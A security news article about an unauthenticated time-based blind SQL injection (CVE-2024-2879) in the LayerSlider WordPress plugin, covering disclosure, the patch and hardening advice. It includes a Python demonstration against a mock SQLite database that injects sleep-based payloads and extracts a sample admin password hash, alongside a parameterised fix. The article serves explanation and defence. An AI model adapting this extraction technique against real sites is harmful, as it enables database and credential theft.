LayerSlider breach: more than 1 million sites are visually attractive, but completely defenseless

Father

A single WordPress plugin can undermine the security of an entire site.

LayerSlider, a popular WordPress plugin used on more than a million websites to build responsive sliders, image galleries, and animations, was recently found to contain a critical vulnerability: an unauthenticated SQL injection.

The vulnerability, designated CVE-2024-2879, was identified by researcher Amr Awad on March 25, 2024 and promptly reported to Wordfence, a WordPress security company, through its bug bounty program. Awad received a $5,500 reward for the responsible disclosure.

The issue affects plugin versions 7.9.11 through 7.10.0 and can lead to the extraction of sensitive data, including password hashes, from the site's database, creating a risk of data leakage or complete site takeover.

The Wordfence report indicates that the flaw stems from improper handling of the "id" parameter in the "ls_get_popup_markup" function: the value is incorporated into the database query without adequate sanitization or a prepared statement, so an attacker can append arbitrary SQL to the query and read information from the database without authenticating to the site.

However, the injection is blind: query results are not returned to the attacker directly, so data has to be inferred by measuring the server's response time (a time-based blind SQL injection). This slows extraction down, but it does not prevent it.
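To make the two preceding paragraphs concrete, here is an added example (not code from the plugin, Wordfence, or the original post) that models the bug class in Python with an in-memory SQLite database. The table and column names, the sample slider row and the password hash are all constructed for the demonstration; SQLite has no SLEEP(), so a registered sleep() function stands in for MySQL's. The vulnerable lookup concatenates the untrusted id into the query; the hardened lookup binds it as a parameter, the equivalent of $wpdb->prepare() with a %d placeholder. The extractor then recovers the admin password hash from the vulnerable lookup one character at a time using nothing but response timing, and fails against the hardened one.

```python
import sqlite3
import time

# Constructed sample data (not the real plugin or WordPress schema).
SAMPLE_HASH = "$P$BdEmoHash0123"   # made-up phpass-style hash
DELAY = 0.03                       # seconds the injected sleep() burns when the condition holds
THRESHOLD = DELAY / 2              # response time above this means "true"


def build_db():
    conn = sqlite3.connect(":memory:")
    # sleep() as a SQL function stands in for MySQL's SLEEP(); it always returns 0.
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    conn.executescript("""
        CREATE TABLE ls_sliders (id INTEGER, name TEXT, data TEXT);
        INSERT INTO ls_sliders VALUES (1, 'home', 'markup-1');
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT);
    """)
    conn.execute("INSERT INTO wp_users VALUES (1, 'admin', ?)", (SAMPLE_HASH,))
    return conn


def popup_markup_vulnerable(conn, slider_id):
    # The bug class: the untrusted id is pasted straight into the SQL text.
    row = conn.execute(
        f"SELECT data FROM ls_sliders WHERE id = {slider_id}").fetchone()
    return row[0] if row else None


def popup_markup_safe(conn, slider_id):
    # Hardened form: the id is a bound parameter, never part of the SQL text.
    row = conn.execute(
        "SELECT data FROM ls_sliders WHERE id = ?", (slider_id,)).fetchone()
    return row[0] if row else None


def time_oracle(lookup, conn, condition):
    """True if the injected condition held, judged purely by response time.

    The CASE expression evaluates to 0 either way, so the lookup's return
    value never changes; only the elapsed time leaks the answer."""
    payload = f"1 AND (SELECT CASE WHEN ({condition}) THEN sleep({DELAY}) ELSE 0 END)"
    start = time.perf_counter()
    lookup(conn, payload)
    return time.perf_counter() - start >= THRESHOLD


def extract_hash_prefix(conn, lookup, length):
    """Recover the first `length` characters of the admin hash by binary-searching
    each character's code point (printable ASCII 32..126) with the time oracle."""
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            cond = (f"(SELECT unicode(substr(user_pass,{pos},1)) FROM wp_users "
                    f"WHERE user_login='admin') > {mid}")
            if time_oracle(lookup, conn, cond):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", extract_hash_prefix(db, popup_markup_vulnerable, 8))
    print("hardened:  ", repr(extract_hash_prefix(db, popup_markup_safe, 8)))
```

Each character costs at most seven requests, and every "true" answer costs one sleep interval, which is why the advisory describes the attack as slower but entirely workable. Against the hardened lookup the payload is compared as an opaque string, the sleep() never executes, and the extractor converges on blanks. In a real plugin the fix is the same idea: pass the id through $wpdb->prepare() (or cast it to an integer) before it reaches the query.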

The Kreatura development team responsible for the plugin was notified immediately and released a security update on March 27, 2024, two days after the vulnerability was reported.

All LayerSlider users are strongly advised to update the plugin to version 7.10.1, which fixes the vulnerability. More generally, WordPress site administrators should keep all plugins up to date, disable the ones they do not need, use strong passwords, and deactivate unused accounts.